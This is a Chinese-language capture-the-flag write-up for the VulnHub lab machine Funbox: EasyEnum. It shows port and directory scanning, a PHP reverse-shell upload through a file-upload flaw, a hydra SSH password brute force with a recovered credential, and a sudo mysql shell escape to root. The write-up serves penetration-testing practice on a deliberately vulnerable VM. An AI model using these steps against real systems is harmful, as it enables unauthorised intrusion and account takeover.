VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM相关的知识,希望对你有一定的参考价值。
题目描述
Boot2root in 6 steps for script-kiddies.
Timeframe to root this box: 20 mins to never ever. It's on you.
HINTS:
Enum without sense, costs you too many time:
1.Use "Daisys best friend" for information gathering.
2.Visit "Karla at home".
3.John and Hydra loves only rockyou.txt
4.Enum/reduce the users to brute force with or brute force the rest of your life.
This works better with VirtualBox rather than VMware
环境下载
- 戳此进行环境下载
FUNBOX: EASYENUM靶机搭建
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
- 目标靶机的 IP 地址为:
192.168.56.115
- 攻击机的 IP 地址为:
192.168.56.102
渗透测试
信息搜集
用 Nmap 扫描一下目标靶机的端口信息:
sudo nmap -sS -A -Pn 192.168.56.115
,发现开放了22、80、110、143
四个端口
用 dirb 扫描一下 80 端口 web 目录:
dirb http://192.168.56.115
漏洞挖掘
- 根据扫描的结果访问
http://192.168.56.115/robots.txt
和http://192.168.56.115/secret/
,得到以下信息
Allow: Enum_this_Box
æ ¹å¯†ç 是用户密ç 的组åˆï¼šharrysallygoatoraclelissy
- 暂时没发现什么可以利用的地方,用
gobuster
再次扫描一下目录,发现一个文件很可疑mini.php
gobuster dir -u http://192.168.56.115 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt
getshell
- 根据扫描结果,访问
http://192.168.56.115/mini.php
,发现存在文件上传漏洞,上传一个 PHP-Shell 反弹马,起 nc 成功接收到反弹的 shell
提权
- 查看用户时发现存在的用户名拼接起来就是
http://192.168.56.115/secret/
中的内容
- 利用 hydra 爆破密码,得到一组可以利用的用户名和密码:
goat:thebest
hydra -l username -P rockyou.txt -V 192.168.56.115 ssh
- 切换用户到 goat,查看
sudo -l
,发现可以利用 mysql 来进行提权,成功拿到 root 权限
sudo /usr/bin/mysql -e '\\! /bin/sh'
以上是关于VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM的主要内容,如果未能解决你的问题,请参考以下文章
VulnHub渗透测试实战靶场 - Funbox: GaoKao
VulnHub渗透测试实战靶场 - Funbox: GaoKao
VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM
VulnHub渗透测试实战靶场 - FUNBOX: GAMBLE HALL